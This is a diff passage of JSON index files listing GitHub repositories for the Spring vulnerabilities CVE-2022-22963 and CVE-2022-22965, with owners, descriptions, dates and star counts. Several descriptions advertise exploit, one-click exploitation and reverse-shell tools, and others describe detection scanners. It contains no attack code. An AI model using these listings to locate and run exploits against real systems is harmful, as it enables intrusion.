"https:\/\/github.com\/puckiestyle\/CVE-2022-22963", + "description": null, + "fork": false, + "created_at": "2022-03-31T11:14:46Z", + "updated_at": "2022-03-31T11:22:08Z", + "pushed_at": "2022-03-31T11:33:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476343941, + "name": "CVE-2022-22963", + "full_name": "me2nuk\/CVE-2022-22963", + "owner": { + "login": "me2nuk", + "id": 57348147, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57348147?v=4", + "html_url": "https:\/\/github.com\/me2nuk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/me2nuk\/CVE-2022-22963", + "description": "Spring Cloud Function Vulnerable Application \/ CVE-2022-22963", + "fork": false, + "created_at": "2022-03-31T14:32:14Z", + "updated_at": "2024-11-29T07:20:19Z", + "pushed_at": "2022-04-01T12:51:25Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476465221, + "name": "Spring-CVE", + "full_name": "kh4sh3i\/Spring-CVE", + "owner": { + "login": "kh4sh3i", + "id": 64693844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4", + "html_url": "https:\/\/github.com\/kh4sh3i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kh4sh3i\/Spring-CVE", + "description": "This includes CVE-2022-22963, a Spring SpEL \/ Expression Resource Access Vulnerability, as well as CVE-2022-22965, the spring-webmvc\/spring-webflux RCE termed \"SpringShell\".", + "fork": false, + "created_at": "2022-03-31T20:19:51Z", + "updated_at": "2024-02-20T06:50:27Z", + "pushed_at": "2022-03-31T20:58:54Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22963", + "cve-2022-22965", + "rce", + "spring", + "spring4shell", + "springsecurity", + "springshell" + ], + "visibility": "public", + "forks": 7, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476680845, + "name": "CVE-2022-22963", + "full_name": "AayushmanThapaMagar\/CVE-2022-22963", + "owner": { + "login": "AayushmanThapaMagar", + "id": 58677654, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58677654?v=4", + "html_url": "https:\/\/github.com\/AayushmanThapaMagar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AayushmanThapaMagar\/CVE-2022-22963", + "description": "POC for CVE-2022-22963", + "fork": false, + "created_at": "2022-04-01T10:47:56Z", + "updated_at": "2022-04-02T02:08:09Z", + "pushed_at": "2022-04-01T10:48:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 477260600, + "name": "cve-2022-22963", + "full_name": "twseptian\/cve-2022-22963", + "owner": { + "login": "twseptian", + "id": 9025301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4", + "html_url": "https:\/\/github.com\/twseptian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twseptian\/cve-2022-22963", + "description": "Spring Cloud Function SpEL - cve-2022-22963", + "fork": false, + "created_at": "2022-04-03T06:45:51Z", + "updated_at": "2022-04-03T07:36:26Z", + "pushed_at": "2022-04-03T07:08:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22963", + "spring-cloud-function-spel", + "sprint-cloud-functions" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, { "id": 478225648, "name": "SpringCloudFunction-Research", @@ -163,5 +454,444 @@ "watchers": 8, "score": 0, "subscribers_count": 1 + }, + { + "id": 531444886, + "name": "CVE-2022-22963", + "full_name": "75ACOL\/CVE-2022-22963", + "owner": { + "login": "75ACOL", + "id": 57381895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57381895?v=4", + "html_url": "https:\/\/github.com\/75ACOL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/75ACOL\/CVE-2022-22963", + "description": null, + "fork": false, + "created_at": "2022-09-01T09:13:59Z", + "updated_at": "2022-09-01T09:13:59Z", + "pushed_at": "2022-09-01T09:14:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 570601413, + "name": "CVE-2022-22963", + "full_name": "dr6817\/CVE-2022-22963", + "owner": { + "login": "dr6817", + "id": 10582363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10582363?v=4", + "html_url": "https:\/\/github.com\/dr6817", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dr6817\/CVE-2022-22963", + "description": null, + "fork": false, + "created_at": "2022-11-25T15:31:19Z", + "updated_at": "2023-11-22T10:03:46Z", + "pushed_at": "2022-11-25T15:42:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589347123, + "name": "CVE-2022-22963-POC", + "full_name": "iliass-dahman\/CVE-2022-22963-POC", + "owner": { + "login": "iliass-dahman", + "id": 40769568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40769568?v=4", + "html_url": "https:\/\/github.com\/iliass-dahman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iliass-dahman\/CVE-2022-22963-POC", + "description": null, + "fork": false, + "created_at": "2023-01-15T21:39:20Z", + "updated_at": "2023-03-24T18:08:12Z", + "pushed_at": "2023-01-22T22:39:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 610851382, + "name": "CVE-2022-22963", + "full_name": "charis3306\/CVE-2022-22963", + "owner": { + "login": "charis3306", + "id": 84823804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84823804?v=4", + "html_url": "https:\/\/github.com\/charis3306", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charis3306\/CVE-2022-22963", + "description": "spring cloud function 一键利用工具! by charis 博客https:\/\/charis3306.top\/", + "fork": false, + "created_at": "2023-03-07T15:57:29Z", + "updated_at": "2024-09-24T03:12:53Z", + "pushed_at": "2023-06-04T08:02:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 613387933, + "name": "CVE-2022-22963-PoC", + "full_name": "lemmyz4n3771\/CVE-2022-22963-PoC", + "owner": { + "login": "lemmyz4n3771", + "id": 116111418, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116111418?v=4", + "html_url": "https:\/\/github.com\/lemmyz4n3771", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lemmyz4n3771\/CVE-2022-22963-PoC", + "description": "CVE-2022-22963 RCE PoC in python", + "fork": false, + "created_at": "2023-03-13T13:28:55Z", + "updated_at": "2023-07-07T22:25:02Z", + "pushed_at": "2023-03-14T15:23:12Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615687765, + "name": "CVE-2022-22963_Reverse-Shell-Exploit", + "full_name": "J0ey17\/CVE-2022-22963_Reverse-Shell-Exploit", + "owner": { + "login": "J0ey17", + "id": 72118225, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72118225?v=4", + "html_url": "https:\/\/github.com\/J0ey17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/J0ey17\/CVE-2022-22963_Reverse-Shell-Exploit", + "description": "CVE-2022-22963 is a vulnerability in the Spring Cloud Function Framework for Java that allows remote code execution. This python script will verify if the vulnerability exists, and if it does, will give you a reverse shell.", + "fork": false, + "created_at": "2023-03-18T11:43:00Z", + "updated_at": "2024-08-12T20:30:19Z", + "pushed_at": "2023-03-18T11:47:55Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616814586, + "name": "CVE-2022-22963", + "full_name": "Mustafa1986\/CVE-2022-22963", + "owner": { + "login": "Mustafa1986", + "id": 27927358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4", + "html_url": "https:\/\/github.com\/Mustafa1986", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mustafa1986\/CVE-2022-22963", + "description": null, + "fork": false, + "created_at": "2023-03-21T06:14:35Z", + "updated_at": "2023-03-21T06:16:01Z", + "pushed_at": "2023-03-21T06:15:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 625969417, + "name": "CVE-2022-22963-Exploit", + "full_name": "SourM1lk\/CVE-2022-22963-Exploit", + "owner": { + "login": "SourM1lk", + "id": 116470756, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116470756?v=4", + "html_url": "https:\/\/github.com\/SourM1lk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SourM1lk\/CVE-2022-22963-Exploit", + "description": "Rust-based exploit for the CVE-2022-22963 vulnerability", + "fork": false, + "created_at": "2023-04-10T14:12:58Z", + "updated_at": "2023-05-31T19:48:01Z", + "pushed_at": "2023-04-11T13:46:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 629041592, + "name": "Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE", + "full_name": "randallbanner\/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE", + "owner": { + "login": "randallbanner", + "id": 99814847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99814847?v=4", + "html_url": "https:\/\/github.com\/randallbanner", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/randallbanner\/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE", + "description": null, + "fork": false, + "created_at": "2023-04-17T13:54:06Z", + "updated_at": "2023-12-10T00:17:36Z", + "pushed_at": "2023-04-17T14:01:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 635879677, + "name": "CVE-2022-22963", + "full_name": "gunzf0x\/CVE-2022-22963", + "owner": { + "login": "gunzf0x", + "id": 31874167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31874167?v=4", + "html_url": "https:\/\/github.com\/gunzf0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gunzf0x\/CVE-2022-22963", + "description": "Binaries for CVE-2022-22963", + "fork": false, + "created_at": "2023-05-03T16:45:06Z", + "updated_at": "2023-05-03T17:19:31Z", + "pushed_at": "2023-05-04T23:24:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22963", + "exploits", + "spring-cloud", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 645500414, + "name": "RCE-in-Spring-Cloud-CVE-2022-22963", + "full_name": "nikn0laty\/RCE-in-Spring-Cloud-CVE-2022-22963", + "owner": { + "login": "nikn0laty", + "id": 96344826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96344826?v=4", + "html_url": "https:\/\/github.com\/nikn0laty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nikn0laty\/RCE-in-Spring-Cloud-CVE-2022-22963", + "description": "Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function", + "fork": false, + "created_at": "2023-05-25T19:50:38Z", + "updated_at": "2023-05-25T19:54:23Z", + "pushed_at": "2023-05-26T21:50:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711317604, + "name": "CVE-2022-22963-Poc-Bearcules", + "full_name": "BearClaw96\/CVE-2022-22963-Poc-Bearcules", + "owner": { + "login": "BearClaw96", + "id": 118552753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118552753?v=4", + "html_url": "https:\/\/github.com\/BearClaw96", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BearClaw96\/CVE-2022-22963-Poc-Bearcules", + "description": "This is a POC for CVE-2022-22963 ", + "fork": false, + "created_at": "2023-10-28T21:42:38Z", + "updated_at": "2023-10-28T21:55:49Z", + "pushed_at": "2023-10-28T21:56:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 797556032, + "name": "CVE-2022-22963", + "full_name": "jrbH4CK\/CVE-2022-22963", + "owner": { + "login": "jrbH4CK", + "id": 163496398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163496398?v=4", + "html_url": "https:\/\/github.com\/jrbH4CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jrbH4CK\/CVE-2022-22963", + "description": null, + "fork": false, + "created_at": "2024-05-08T04:25:29Z", + "updated_at": "2024-07-30T23:22:39Z", + "pushed_at": "2024-07-30T23:22:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 903170019, + "name": "CVE-2022-22963", + "full_name": "Shayz614\/CVE-2022-22963", + "owner": { + "login": "Shayz614", + "id": 77766318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77766318?v=4", + "html_url": "https:\/\/github.com\/Shayz614", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shayz614\/CVE-2022-22963", + "description": "CVE to CTF FP", + "fork": false, + "created_at": "2024-12-13T22:54:28Z", + "updated_at": "2024-12-13T22:56:47Z", + "pushed_at": "2024-12-13T22:56:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-22965.json b/2022/CVE-2022-22965.json index 3b0483e816..f66762b571 100644 --- a/2022/CVE-2022-22965.json +++ b/2022/CVE-2022-22965.json @@ -39,6 +39,42 @@ "score": 0, "subscribers_count": 18 }, + { + "id": 475918792, + "name": "spring-core-rce", + "full_name": "Mr-xn\/spring-core-rce", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/spring-core-rce", + "description": "CVE-2022-22965 : about spring core rce", + "fork": false, + "created_at": "2022-03-30T14:35:00Z", + "updated_at": "2025-01-04T08:08:06Z", + "pushed_at": "2022-04-01T15:34:03Z", + "stargazers_count": 50, + "watchers_count": 50, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22965", + "spring", + "spring-mvc", + "spring-security" + ], + "visibility": "public", + "forks": 18, + "watchers": 50, + "score": 0, + "subscribers_count": 2 + }, { "id": 475975991, "name": "SpringShell", @@ -112,6 +148,37 @@ "score": 0, "subscribers_count": 11 }, + { + "id": 476115414, + "name": "CVE-2022-22965-GUItools", + "full_name": "light-Life\/CVE-2022-22965-GUItools", + "owner": { + "login": "light-Life", + "id": 53685855, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53685855?v=4", + "html_url": "https:\/\/github.com\/light-Life", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/light-Life\/CVE-2022-22965-GUItools", + "description": "spring-core单个图形化利用工具,CVE-2022-22965及修复方案已出", + "fork": false, + "created_at": "2022-03-31T02:00:18Z", + "updated_at": "2025-01-04T08:08:06Z", + "pushed_at": "2022-04-02T15:29:31Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, { "id": 476210489, "name": "springshell-rce-poc", @@ -371,6 +438,37 @@ "score": 0, "subscribers_count": 1 }, + { + "id": 476424726, + "name": "spring4shell-CVE-2022-22965", + "full_name": "rwincey\/spring4shell-CVE-2022-22965", + "owner": { + "login": "rwincey", + "id": 5438659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5438659?v=4", + "html_url": "https:\/\/github.com\/rwincey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rwincey\/spring4shell-CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-03-31T18:09:58Z", + "updated_at": "2022-04-04T14:13:42Z", + "pushed_at": "2022-04-01T13:59:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, { "id": 476446818, "name": "CVE-2022-22965-poc", @@ -402,6 +500,37 @@ "score": 0, "subscribers_count": 1 }, + { + "id": 476522206, + "name": "springhound", + "full_name": "mebibite\/springhound", + "owner": { + "login": "mebibite", + "id": 54244269, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54244269?v=4", + "html_url": "https:\/\/github.com\/mebibite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mebibite\/springhound", + "description": "Created after the disclosure of CVE-2022-22965 and CVE-2022-22963. Bash script that detects Spring Framework occurrences in your projects and systems, allowing you to get insight on versions used. Unpacks JARs and analyses their Manifest files.", + "fork": false, + "created_at": "2022-04-01T00:34:29Z", + "updated_at": "2024-04-22T19:41:50Z", + "pushed_at": "2022-04-01T00:42:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, { "id": 476546576, "name": "CVE-2022-22965", @@ -433,6 +562,37 @@ "score": 0, "subscribers_count": 1 }, + { + "id": 476577644, + "name": "SpringFramework_CVE-2022-22965_RCE", + "full_name": "Axx8\/SpringFramework_CVE-2022-22965_RCE", + "owner": { + "login": "Axx8", + "id": 34683107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34683107?v=4", + "html_url": "https:\/\/github.com\/Axx8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Axx8\/SpringFramework_CVE-2022-22965_RCE", + "description": "SpringFramework 远程代码执行漏洞CVE-2022-22965", + "fork": false, + "created_at": "2022-04-01T04:51:44Z", + "updated_at": "2024-08-12T20:22:03Z", + "pushed_at": "2022-04-01T12:08:45Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 75, + "score": 0, + "subscribers_count": 1 + }, { "id": 476597168, "name": "spring-boot-cve-2022-22965", @@ -495,6 +655,37 @@ "score": 0, "subscribers_count": 1 }, + { + "id": 476626448, + "name": "CVE-2022-22965-Spring-Core-Rce", + "full_name": "tangxiaofeng7\/CVE-2022-22965-Spring-Core-Rce", + "owner": { + "login": "tangxiaofeng7", + "id": 45926593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926593?v=4", + "html_url": "https:\/\/github.com\/tangxiaofeng7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tangxiaofeng7\/CVE-2022-22965-Spring-Core-Rce", + "description": "批量无损检测CVE-2022-22965", + "fork": false, + "created_at": "2022-04-01T07:55:26Z", + "updated_at": "2024-11-16T19:51:09Z", + "pushed_at": "2022-04-01T08:44:19Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 37, + "score": 0, + "subscribers_count": 2 + }, { "id": 476671454, "name": "CVE-2022-22965", @@ -526,6 +717,68 @@ "score": 0, "subscribers_count": 7 }, + { + "id": 476681722, + "name": "CVE-2022-22965", + "full_name": "lcarea\/CVE-2022-22965", + "owner": { + "login": "lcarea", + "id": 59819921, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59819921?v=4", + "html_url": "https:\/\/github.com\/lcarea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lcarea\/CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-04-01T10:51:05Z", + "updated_at": "2023-11-18T22:46:48Z", + "pushed_at": "2022-04-01T11:19:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476708454, + "name": "CVE-2022-22965", + "full_name": "Joe1sn\/CVE-2022-22965", + "owner": { + "login": "Joe1sn", + "id": 37005640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37005640?v=4", + "html_url": "https:\/\/github.com\/Joe1sn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Joe1sn\/CVE-2022-22965", + "description": "CVE-2022-22965 Environment", + "fork": false, + "created_at": "2022-04-01T12:18:29Z", + "updated_at": "2022-04-02T02:08:46Z", + "pushed_at": "2022-04-02T09:50:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, { "id": 476714401, "name": "CVE-2022-22965", @@ -588,6 +841,130 @@ "score": 0, "subscribers_count": 1 }, + { + "id": 476738410, + "name": "spring-framework-rce", + "full_name": "wshon\/spring-framework-rce", + "owner": { + "login": "wshon", + "id": 16683806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16683806?v=4", + "html_url": "https:\/\/github.com\/wshon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wshon\/spring-framework-rce", + "description": "CVE-2022-22965", + "fork": false, + "created_at": "2022-04-01T13:46:55Z", + "updated_at": "2024-05-26T02:03:33Z", + "pushed_at": "2022-04-01T14:31:35Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 476934750, + "name": "CVE-2022-22965", + "full_name": "Wrin9\/CVE-2022-22965", + "owner": { + "login": "Wrin9", + "id": 54984589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54984589?v=4", + "html_url": "https:\/\/github.com\/Wrin9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wrin9\/CVE-2022-22965", + "description": "CVE-2022-22965 POC", + "fork": false, + "created_at": "2022-04-02T03:17:48Z", + "updated_at": "2024-08-12T20:22:04Z", + "pushed_at": "2022-04-02T08:45:17Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 477004407, + "name": "CVE-2022-22965_Spring_Core_RCE", + "full_name": "wjl110\/CVE-2022-22965_Spring_Core_RCE", + "owner": { + "login": "wjl110", + "id": 53851034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53851034?v=4", + "html_url": "https:\/\/github.com\/wjl110", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wjl110\/CVE-2022-22965_Spring_Core_RCE", + "description": "CVE-2022-22965\\Spring-Core-RCE堪比关于 Apache Log4j2核弹级别漏洞exp的rce一键利用", + "fork": false, + "created_at": "2022-04-02T09:13:54Z", + "updated_at": "2024-08-12T20:22:05Z", + "pushed_at": "2022-04-02T10:14:11Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 477155956, + "name": "cve-2022-22965", + "full_name": "mwojterski\/cve-2022-22965", + "owner": { + "login": "mwojterski", + "id": 474439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/474439?v=4", + "html_url": "https:\/\/github.com\/mwojterski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mwojterski\/cve-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-04-02T19:47:47Z", + "updated_at": "2022-10-15T13:39:43Z", + "pushed_at": "2022-04-02T20:23:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, { "id": 477210316, "name": "nmap-spring4shell", @@ -626,6 +1003,37 @@ "score": 0, "subscribers_count": 1 }, + { + "id": 477260087, + "name": "CVE-2022-22965", + "full_name": "itsecurityco\/CVE-2022-22965", + "owner": { + "login": "itsecurityco", + "id": 1725054, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1725054?v=4", + "html_url": "https:\/\/github.com\/itsecurityco", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/itsecurityco\/CVE-2022-22965", + "description": "Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5", + "fork": false, + "created_at": "2022-04-03T06:43:07Z", + "updated_at": "2025-01-05T11:01:55Z", + "pushed_at": "2022-04-03T08:38:30Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + }, { "id": 477654438, "name": "Invoke-CVE-2022-22965-SafeCheck", @@ -1520,5 +1928,588 @@ "watchers": 150, "score": 0, "subscribers_count": 2 + }, + { + "id": 510569312, + "name": "Spring4Shell-CVE-2022-22965", + "full_name": "D1mang\/Spring4Shell-CVE-2022-22965", + "owner": { + "login": "D1mang", + "id": 24488612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24488612?v=4", + "html_url": "https:\/\/github.com\/D1mang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D1mang\/Spring4Shell-CVE-2022-22965", + "description": "EXP for Spring4Shell(CVE-2022-22965)", + "fork": false, + "created_at": "2022-07-05T03:03:31Z", + "updated_at": "2022-07-27T02:20:42Z", + "pushed_at": "2022-07-13T00:30:22Z", + "stargazers_count": 2, 